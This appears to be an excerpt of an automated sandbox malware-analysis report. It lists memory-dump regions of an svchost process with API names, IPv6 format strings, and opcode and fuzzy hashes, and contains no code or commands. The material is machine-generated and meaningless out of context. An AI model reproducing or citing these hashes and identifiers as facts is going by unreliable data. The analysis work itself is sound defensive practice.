                                                                            • Associated: 00000009.00000002.3361124338.000000000389E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_3700000_svchost.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 809509ee8dc6b1df37724ff052a8fabbf3f7d4ff79946aa9a7c1b1c8a51c034f
                                                                            • Instruction ID: 7a1e8db8cf40dd9052365ecdc09a0ffd9a1fab3846d9258643a6c45e3c04c330
                                                                            • Opcode Fuzzy Hash: 809509ee8dc6b1df37724ff052a8fabbf3f7d4ff79946aa9a7c1b1c8a51c034f
                                                                            • Instruction Fuzzy Hash: 22B02B719014C4C5EF00F3200608707390467D0300F19C471D3030241F0338C0C0E173
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.3361062651.0000000003600000.00000040.00000800.00020000.00000000.sdmp, Offset: 03600000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 21cae2ebd3f23408dbc3c7fcb659737e0256e99751d6b2883271d9092eea1737
                                                                            • Instruction ID: e462208ed0a714e29bd8bd967980cc03904649797c89fb7303c0180dce4e46c6
                                                                            • Opcode Fuzzy Hash: 21cae2ebd3f23408dbc3c7fcb659737e0256e99751d6b2883271d9092eea1737
                                                                            • Instruction Fuzzy Hash: 2041E37551CB494FD36CEF68908277BB3E2FB85300F54052DD98AC3292EA71E8068789
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.3361062651.0000000003600000.00000040.00000800.00020000.00000000.sdmp, Offset: 03600000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                            • API String ID: 0-3558027158
                                                                            • Opcode ID: fd5ec37fae888dbf385e4e5863fa423fbb9134c8379c8bb482501ff6dd47b143
                                                                            • Instruction ID: 5e53e8763a60dbb1651f0b6ea7a475cdeb3b8866bb28347175abf3a5f51a226b
                                                                            • Opcode Fuzzy Hash: fd5ec37fae888dbf385e4e5863fa423fbb9134c8379c8bb482501ff6dd47b143
                                                                            • Instruction Fuzzy Hash: 95A152F04082948AC7198F54A1652AFFFB1EBC6305F15816DE7E6BB243C37E89058B95
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.3361124338.0000000003700000.00000040.00001000.00020000.00000000.sdmp, Offset: 03700000, based on PE: true
                                                                            • Associated: 00000009.00000002.3361124338.0000000003829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000009.00000002.3361124338.000000000382D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000009.00000002.3361124338.000000000389E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_3700000_svchost.jbxd
                                                                            Similarity
                                                                            • API ID: ___swprintf_l
                                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                            • API String ID: 48624451-2108815105
                                                                            • Opcode ID: 1481522924cd534278ed7d4c012b5e4c1c6f5810e78f494aae091d95cf0956f1
                                                                            • Instruction ID: e480a961732b4b8cb3001394d4abb444067964e1a0326b1b36e0804f97dab589
                                                                            • Opcode Fuzzy Hash: 1481522924cd534278ed7d4c012b5e4c1c6f5810e78f494aae091d95cf0956f1
                                                                            • Instruction Fuzzy Hash: DD51E8B5A04616BFDF10DB9C889097EF7B8BB49200B188669E4B5E7642D334DE40DBA0
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.3361124338.0000000003700000.00000040.00001000.00020000.00000000.sdmp, Offset: 03700000, based on PE: true
                                                                            • Associated: 00000009.00000002.3361124338.0000000003829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000009.00000002.3361124338.000000000382D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000009.00000002.3361124338.000000000389E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_3700000_svchost.jbxd
                                                                            Similarity
                                                                            • API ID: ___swprintf_l
                                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                            • API String ID: 48624451-2108815105
                                                                            • Opcode ID: 1f7754a476a14a9ada4ac19dd61c0ec435b2b53c38beff3ae2bfd2b57a6237e1
                                                                            • Instruction ID: 83699eb163f8a4ef8972be4eb0eed5392ee479f92c6cadb598add282d1d11e0b
                                                                            • Opcode Fuzzy Hash: 1f7754a476a14a9ada4ac19dd61c0ec435b2b53c38beff3ae2bfd2b57a6237e1
                                                                            • Instruction Fuzzy Hash: 6951EAB5A00655AEDB30EF5CC99097FB7FDEB48200B148899E4A6DB642D774EE40C760
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.3361124338.0000000003700000.00000040.00001000.00020000.00000000.sdmp, Offset: 03700000, based on PE: true
                                                                            • Associated: 00000009.00000002.3361124338.0000000003829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000009.00000002.3361124338.000000000382D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000009.00000002.3361124338.000000000389E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_3700000_svchost.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                            • Instruction ID: 6255d27210777c12dc984cef833da454032cf7f27f00b3fc16ee54bc5b2e6faa
                                                                            • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                            • Instruction Fuzzy Hash: 42024574508341AFC754CF58C894A6BBBE5FFC8700F148A6DF9859B2A4EB31E905CB42
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.3361124338.0000000003700000.00000040.00001000.00020000.00000000.sdmp, Offset: 03700000, based on PE: true
                                                                            • Associated: 00000009.00000002.3361124338.0000000003829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000009.00000002.3361124338.000000000382D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000009.00000002.3361124338.000000000389E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_3700000_svchost.jbxd
                                                                            Similarity
                                                                            • API ID: ___swprintf_l
                                                                            • String ID: %%%u$[$]:%u
                                                                            • API String ID: 48624451-2819853543
                                                                            • Opcode ID: 167d9e7c3f38d97127b193723786296a747cce69fb3f86faa9774502b2717fad
                                                                            • Instruction ID: c77a6a8f46bdf1bda3bb73797f9e6630be9ddea1ad5cd2ef26b0b555191f1bdc
                                                                            • Opcode Fuzzy Hash: 167d9e7c3f38d97127b193723786296a747cce69fb3f86faa9774502b2717fad
                                                                            • Instruction Fuzzy Hash: D421887AE00219ABDB10EF79CC44AFEBBFDEF58644F180516E915E7201E730DA059BA1
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.3361124338.0000000003700000.00000040.00001000.00020000.00000000.sdmp, Offset: 03700000, based on PE: true
                                                                            • Associated: 00000009.00000002.3361124338.0000000003829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000009.00000002.3361124338.000000000382D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000009.00000002.3361124338.000000000389E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_3700000_svchost.jbxd
                                                                            Similarity
                                                                            • API ID: ___swprintf_l
                                                                            • String ID: %%%u$]:%u
                                                                            • API String ID: 48624451-3050659472
                                                                            • Opcode ID: 9ff631be399c5ad3980db6c7a92d40aa919dc773724325447bcfc7543c249358
                                                                            • Instruction ID: 31998f9669428fac11c2903361fdb067a68e3276784359392cfeb0ff19006303
                                                                            • Opcode Fuzzy Hash: 9ff631be399c5ad3980db6c7a92d40aa919dc773724325447bcfc7543c249358
                                                                            • Instruction Fuzzy Hash: 3B317876A00219AFDB20EF29CC44BEEB7FCEF48610F544556E849E7241EB30DA449FA0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.3361124338.0000000003700000.00000040.00001000.00020000.00000000.sdmp, Offset: 03700000, based on PE: true
                                                                            • Associated: 00000009.00000002.3361124338.0000000003829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000009.00000002.3361124338.000000000382D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000009.00000002.3361124338.000000000389E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_3700000_svchost.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $$@
                                                                            • API String ID: 0-1194432280
                                                                            • Opcode ID: 00d750ed9975d4c9784849a775cdf9f16811852fa27402cf1930b3d5d4f0c84f
                                                                            • Instruction ID: f3762cf06c55398297386bf0cb38debe67d2c673b851f1e82de8988030a4c907
                                                                            • Opcode Fuzzy Hash: 00d750ed9975d4c9784849a775cdf9f16811852fa27402cf1930b3d5d4f0c84f
                                                                            • Instruction Fuzzy Hash: 71813B76D002699BDB31DF54CC44BEEB7B8AB49710F0445DAEA09B7681E7709E80CFA0
                                                                            APIs
                                                                            • @_EH4_CallFilterFunc@8.LIBCMT ref: 037BCFBD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.3361124338.0000000003700000.00000040.00001000.00020000.00000000.sdmp, Offset: 03700000, based on PE: true
                                                                            • Associated: 00000009.00000002.3361124338.0000000003829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000009.00000002.3361124338.000000000382D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000009.00000002.3361124338.000000000389E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_3700000_svchost.jbxd
                                                                            Similarity
                                                                            • API ID: CallFilterFunc@8
                                                                            • String ID: @$@4Cw@4Cw
                                                                            • API String ID: 4062629308-3101775584
                                                                            • Opcode ID: 4330369866dcc672b0345ab1c06c494f8f11b81c501f7788f057748262b31055
                                                                            • Instruction ID: 9b94882ec219b724689109dfd6b1ddefb6dc090bb145f88f380fafdfeecf7bfe
                                                                            • Opcode Fuzzy Hash: 4330369866dcc672b0345ab1c06c494f8f11b81c501f7788f057748262b31055
                                                                            • Instruction Fuzzy Hash: D741D079A00228DFCB21DFA8C844BADBBB8EF55704F0484AAE914DF254D774D941CB60